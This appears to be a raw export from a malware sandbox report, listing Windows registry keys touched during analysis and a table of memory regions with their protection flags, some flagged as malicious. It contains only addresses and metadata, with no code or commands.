HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpeg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
lnkfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2ts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
WMP11.AssocFile.m3u
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
WMP11.AssocFile.M4A
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MK3D\OpenWithProgids
WMP11.AssocFile.MK3D
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
WMP11.AssocFile.MKA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
WMP11.AssocFile.MKV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mod\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
WMP11.AssocFile.MOV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MPE\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
Outlook.File.msg.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
ocxfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
PowerPoint.OpenDocumentPresentation.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
Excel.OpenDocumentSpreadsheet.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
Word.OpenDocumentText.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
otffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
pngfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
PowerPoint.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
PowerPoint.TemplateMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
PowerPoint.Template.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
PowerPoint.Addin.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
PowerPoint.SlideShowMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
PowerPoint.SlideShow.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
PowerPoint.Show.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
PowerPoint.ShowMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
PowerPoint.Show.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
Microsoft.PowerShellXMLData.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
Microsoft.PowerShellSessionConfiguration.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
rlefile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
Word.RTF.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
SHCmdFile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
SearchFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
PowerPoint.SlideMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
PowerPoint.Slide.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
sysfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
ttcfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
ttffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
txtfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
bootstrap.vsto.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
WMP11.AssocFile.WAV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
WMP11.AssocFile.WAX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
WMP11.AssocFile.WMA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
wmffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
WMP11.AssocFile.WMV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
WMP11.AssocFile.WPL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
WMP11.AssocFile.WVX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
Excel.AddInMacroEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
Excel.Sheet.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
Excel.SheetBinaryMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
Excel.SheetMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Excel.Sheet.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
Excel.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
Excel.TemplateMacroEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
Excel.Template
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
xmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
xslfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
TaskbarStateLastRun
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021492-0000-0000-C000-000000000046}\Enum
Implementing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ef47ea26-ec76-4a6e-8680-9e53b539546d}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4b110390-e32a-400c-bf41-7fe93773464a}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{b8455d9b-4916-480e-8b44-905b33ca001e}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010398
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001039A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010370
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010358
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010372
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010366
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001036C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010350
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010348
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010334
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000009008C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001031A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001031C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010318
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$$windows.data.signals.registrations\Current
Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ef47ea26-ec76-4a6e-8680-9e53b539546d}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4b110390-e32a-400c-bf41-7fe93773464a}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{b8455d9b-4916-480e-8b44-905b33ca001e}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
Generation
There are 210 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
D70E000
unkown
page execute and read and write
malicious
3420000
unclassified section
page execute and read and write
malicious
2738000
system
page execute and read and write
malicious
3C50000
trusted library allocation
page read and write
malicious
D80000
unclassified section
page execute and read and write
malicious
B20000
unclassified section
page execute and read and write
malicious
3210000
system
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
2738000
system
page execute and read and write
malicious
181C4D54000
trusted library allocation
page read and write
malicious
181CCFB0000
trusted library section
page read and write
malicious
181C4C37000
trusted library allocation
page read and write
malicious
D70E000
unkown
page execute and read and write
malicious
7FF51464E000
unkown
page readonly
ADEF000
stack
page read and write
5A6000
heap
page read and write
223E7AD0000
heap
page read and write
97C0000
unkown
page readonly
1DF7A8DA000
heap
page read and write
7FF514713000
unkown
page readonly
7DE0000
heap
page read and write
6AA3000
heap
page read and write
7DC4000
heap
page read and write
95160FF000
stack
page read and write
7FF514B8E000
unkown
page readonly
7B4F000
heap
page read and write
7384000
unkown
page readonly
7FF514745000
unkown
page readonly
79EF000
stack
page read and write
181B60C0000
trusted library allocation
page read and write
4203000
heap
page read and write
1E0000
heap
page read and write
4A42000
system
page read and write
23A8506B000
trusted library allocation
page read and write
9AA3000
unkown
page readonly
7FF514AC7000
unkown
page readonly
7FF514BCC000
unkown
page readonly
1F1A0A3D000
heap
page read and write
181CCDD8000
heap
page read and write
7D77000
heap
page read and write
A185000
unkown
page readonly
70F0000
trusted library allocation
page read and write
7FFEBFCC0000
trusted library allocation
page read and write
7E08000
heap
page read and write
435D000
unkown
page read and write
7FF514A69000
unkown
page readonly
6C0D000
heap
page read and write
181B49F0000
trusted library allocation
page read and write
209E000
stack
page read and write
782F000
unkown
page read and write
473A000
heap
page read and write
7CCA000
heap
page read and write
7E1A000
heap
page read and write
181CD540000
trusted library allocation
page read and write
7DBC000
heap
page read and write
7C17000
heap
page read and write
181CCA12000
heap
page read and write
24204D02000
heap
page read and write
6AF2000
heap
page read and write
7DEC000
heap
page read and write
181CCFD0000
trusted library allocation
page read and write
1F19B09D000
heap
page read and write
22E1B60A000
heap
page read and write
7FFEBFDE0000
trusted library allocation
page read and write
2100000
heap
page read and write
6AC5000
heap
page read and write
250000
unkown
page read and write
7FF514BB9000
unkown
page readonly
970000
heap
page read and write
EC7D000
unkown
page read and write
4871000
unkown
page read and write
B74000
heap
page read and write
B368000
stack
page read and write
6AA0000
heap
page read and write
E1E9000
unkown
page read and write
8228000
unkown
page read and write
7FFEBFE10000
trusted library allocation
page read and write
1160000
heap
page read and write
A23E000
unkown
page readonly
7D5F000
heap
page read and write
7FF51477E000
unkown
page readonly
770000
heap
page read and write
7FF514701000
unkown
page readonly
76E5000
stack
page read and write
5281FE000
stack
page read and write
710000
unkown
page read and write
30E6F7F000
stack
page read and write
8220000
unkown
page read and write
22E1B400000
unkown
page read and write
7DE9000
stack
page read and write
F876000
heap
page read and write
7BDE000
heap
page read and write
6A9F000
heap
page read and write
CE7C000
unkown
page readonly
7DF2000
heap
page read and write
1F1A0ADC000
heap
page read and write
7FFF29450000
unkown
page readonly
1C80DDE4000
heap
page read and write
7C27000
heap
page read and write
24CE000
stack
page read and write
7DC1000
heap
page read and write
9A0000
unkown
page readonly
6AA4000
heap
page read and write
F7FA000
heap
page read and write
3EF3000
unkown
page read and write
7FF514BFC000
unkown
page readonly
201E000
stack
page read and write
951738D000
stack
page read and write
1E9DCEE6000
heap
page read and write
3FB2000
trusted library allocation
page read and write
7F91000
unkown
page read and write
7CA4000
heap
page read and write
A1C3000
unkown
page readonly
7B91000
heap
page read and write
80C000
heap
page read and write
F7A9000
heap
page read and write
4821000
heap
page read and write
7E3A000
heap
page read and write
C6D3000
unkown
page readonly
223E7C2A000
heap
page read and write
4140000
unkown
page read and write
4424000
system
page execute and read and write
73E0000
trusted library allocation
page read and write
4290000
unkown
page read and write
7FF514842000
unkown
page readonly
23A84EA2000
trusted library allocation
page read and write
FB0B000
heap
page read and write
7FFEBFD07000
trusted library allocation
page read and write
7C11000
heap
page read and write
7FFEBFDA0000
trusted library allocation
page read and write
1D24F37000
stack
page read and write
482F000
heap
page read and write
7DEB000
heap
page read and write
7FF514A26000
unkown
page readonly
8237000
unkown
page read and write
88AB777000
stack
page read and write
550000
heap
page read and write
F7B3000
heap
page read and write
7D03000
heap
page read and write
7FFF295F3000
unkown
page readonly
23A82CA0000
heap
page read and write
2608000
stack
page read and write
7B5B000
heap
page read and write
E060000
unkown
page read and write
7FFEBFC80000
trusted library allocation
page read and write
EDF7000
unkown
page read and write
8220000
unkown
page read and write
536C000
unkown
page read and write
2A38000
stack
page read and write
6700000
trusted library allocation
page read and write
1F19B029000
heap
page read and write
7FFEBFC90000
trusted library allocation
page read and write
EF66000
stack
page read and write
181B44D0000
trusted library allocation
page read and write
73F3000
trusted library allocation
page read and write
7FF5144C7000
unkown
page readonly
4436000
heap
page read and write
7DD1000
heap
page read and write
7FF5146A7000
unkown
page readonly
97D0000
unkown
page readonly
7FF51471F000
unkown
page readonly
DC6000
heap
page read and write
7DFA000
heap
page read and write
6AA0000
heap
page read and write
7C9D000
heap
page read and write
57E0000
unkown
page readonly
A289000
unkown
page readonly
41CE000
heap
page read and write
760C000
unkown
page readonly
1F19B070000
heap
page read and write
B0EE000
stack
page read and write
181CD450000
trusted library allocation
page read and write
783E000
unkown
page read and write
4500000
unkown
page read and write
268F000
stack
page read and write
8269000
unkown
page read and write
23A9CF00000
trusted library allocation
page read and write
3470000
heap
page read and write
8DF000
heap
page read and write
DB4B000
unkown
page read and write
7FFF2E3AD000
unkown
page write copy
6D50000
trusted library allocation
page read and write
300000
unkown
page read and write
1FD1AF20000
heap
page execute and read and write
27E2000
heap
page read and write
1E9DCE3C000
heap
page read and write
8443DFB000
stack
page read and write
7B81000
heap
page read and write
708D000
stack
page read and write
E71E000
unkown
page read and write
7E34000
heap
page read and write
7553000
unkown
page readonly
7C17000
heap
page read and write
4918000
heap
page read and write
718000
heap
page read and write
2834000
unkown
page read and write
7FF5144C9000
unkown
page readonly
223E7C09000
heap
page read and write
22E1B402000
unkown
page read and write
16AB9F65000
heap
page read and write
475000
stack
page read and write
D3EE000
stack
page read and write
1FD1CAB3000
trusted library allocation
page read and write
900000
unkown
page readonly
4880000
unkown
page read and write
7E4A000
heap
page read and write
1DF7B360000
trusted library allocation
page read and write
7C25000
heap
page read and write
8B0A000
unkown
page read and write
9F55000
unkown
page readonly
8B0A000
unkown
page read and write
7FF514B7A000
unkown
page readonly
7FF514C95000
unkown
page readonly
7B44000
heap
page read and write
1E9DDC20000
heap
page read and write
7FF5148AB000
unkown
page readonly
223E996C000
heap
page read and write
7CEE000
heap
page read and write
7FF51499D000
unkown
page readonly
5341000
unkown
page read and write
7D30000
heap
page read and write
738D000
stack
page read and write
1FD1C9FF000
trusted library allocation
page read and write
10B0E000
heap
page read and write
3CE0000
heap
page read and write
F8D5000
heap
page read and write
3EE0000
unkown
page read and write
473A000
heap
page read and write
4121000
unkown
page read and write
7FF514742000
unkown
page readonly
4436000
heap
page read and write
3304000
heap
page read and write
4206000
heap
page read and write
6E33000
unkown
page readonly
23A9CC81000
heap
page read and write
2B8D000
stack
page read and write
2300000
unkown
page readonly
73D0000
trusted library allocation
page read and write
427A000
stack
page read and write
7B5B000
heap
page read and write
7FF514C0E000
unkown
page readonly
23A9CD17000
heap
page execute and read and write
F16B000
stack
page read and write
424A000
stack
page read and write
66C3000
trusted library allocation
page read and write
7FF51485C000
unkown
page readonly
7AA4000
heap
page read and write
7D30000
heap
page read and write
2857000
heap
page read and write
7FF5146A4000
unkown
page readonly
23A84A5B000
trusted library allocation
page read and write
7FFEBFB36000
trusted library allocation
page read and write
7FF514500000
unkown
page readonly
7C19000
heap
page read and write
16AD4020000
trusted library allocation
page read and write
7FF514992000
unkown
page readonly
7F84000
unkown
page read and write
48A6000
heap
page read and write
708E000
stack
page read and write
2811000
heap
page read and write
181CCFF0000
trusted library allocation
page read and write
7FF514434000
unkown
page readonly
25B1000
heap
page read and write
7A94000
heap
page read and write
2809000
unkown
page read and write
7DCA000
heap
page read and write
7E4F000
heap
page read and write
F8EB000
heap
page read and write
EE7C000
unkown
page read and write
4255000
heap
page read and write
23A9CC78000
heap
page read and write
220000
heap
page read and write
6DF0000
unkown
page readonly
7B6A000
heap
page read and write
E7000
stack
page read and write
750000
unkown
page read and write
1FD1954E000
heap
page read and write
7B57000
heap
page read and write
7FFEBFD50000
trusted library allocation
page read and write
2350000
unkown
page read and write
7B91000
heap
page read and write
7DF446151000
trusted library allocation
page execute read
223E9959000
heap
page read and write
DF10000
heap
page read and write
7590000
unkown
page read and write
2B30000
unkown
page readonly
7E45000
heap
page read and write
9A8B000
unkown
page readonly
1FD1AF50000
trusted library allocation
page read and write
1FD337B7000
heap
page read and write
4729000
heap
page read and write
7FF51484D000
unkown
page readonly
7F4000
heap
page read and write
1F19BB18000
heap
page read and write
7FF514A64000
unkown
page readonly
5F2000
heap
page read and write
7C07000
heap
page read and write
58B0000
unkown
page read and write
6BF2000
heap
page read and write
7FF514AAA000
unkown
page readonly
5367000
unkown
page read and write
4500000
unkown
page read and write
72F7000
unkown
page readonly
DF1A000
heap
page read and write
4250000
trusted library allocation
page read and write
97D3000
heap
page read and write
84E000
stack
page read and write
1F9E000
stack
page read and write
7D62000
heap
page read and write
3304000
heap
page read and write
6CA0000
trusted library allocation
page read and write
1DF7AFA0000
heap
page read and write
7FF51481C000
unkown
page readonly
181CD4F0000
trusted library allocation
page read and write
F642000
heap
page read and write
181CCE38000
heap
page read and write
6AF7000
heap
page read and write
7C0D000
heap
page read and write
720000
unkown
page readonly
1F1A07B4000
trusted library allocation
page read and write
193F2A46000
heap
page read and write
7F70000
unkown
page read and write
6E22000
unkown
page readonly
20A41D52000
heap
page read and write
1E9DD795000
heap
page read and write
EBF51FE000
stack
page read and write
270B000
stack
page read and write
23A94A64000
trusted library allocation
page read and write
6B14000
heap
page read and write
F8F3000
heap
page read and write
7D67000
heap
page read and write
7FF514A51000
unkown
page readonly
1FD1B5DB000
trusted library allocation
page read and write
1DF78F84000
heap
page read and write
7B81000
heap
page read and write
10B0E000
heap
page read and write
1DF78E50000
unkown
page readonly
7DDB000
heap
page read and write
7DD7000
heap
page read and write
F8FD000
heap
page read and write
3467000
heap
page read and write
7DF6000
heap
page read and write
2835000
heap
page read and write
209E000
stack
page read and write
6AA4000
heap
page read and write
1E9DD798000
heap
page read and write
7FF514B4B000
unkown
page readonly
7FF514701000
unkown
page readonly
7E53000
heap
page read and write
21F8000
stack
page read and write
750000
unkown
page read and write
7D0A000
heap
page read and write
7B4B000
heap
page read and write
775000
heap
page read and write
7C19000
heap
page read and write
98DE000
unkown
page read and write
7C27000
heap
page read and write
4079000
stack
page read and write
4257000
heap
page read and write
F73F000
heap
page read and write
AB3557F000
stack
page read and write
7B4F000
heap
page read and write
9D5000
heap
page read and write
FBDA000
stack
page read and write
7FF514B9F000
unkown
page readonly
A27C000
unkown
page readonly
6AA8000
heap
page read and write
6AA8000
heap
page read and write
FD07000
heap
page read and write
7FF5147B1000
unkown
page readonly
A002000
unkown
page readonly
7DF446141000
trusted library allocation
page execute read
2B62000
system
page read and write
642E000
stack
page read and write
71B3000
trusted library allocation
page read and write
43FA000
system
page execute and read and write
A6EA000
stack
page read and write
7B55000
heap
page read and write
7D99000
heap
page read and write
22FE000
stack
page read and write
6AC5000
heap
page read and write
43C0000
trusted library allocation
page read and write
690000
unkown
page read and write
FAF8000
heap
page read and write
7A1E000
heap
page read and write
B8E50F7000
stack
page read and write
282D000
heap
page read and write
2AC0000
unkown
page readonly
69A0000
trusted library allocation
page read and write
23A82D44000
heap
page read and write
FEDD000
stack
page read and write
30000
unkown
page read and write
7ACA000
heap
page read and write
109EF000
heap
page read and write
1F1A1000000
unkown
page read and write
1F19BA02000
heap
page read and write
223E9959000
heap
page read and write
7FF514975000
unkown
page readonly
532E000
unkown
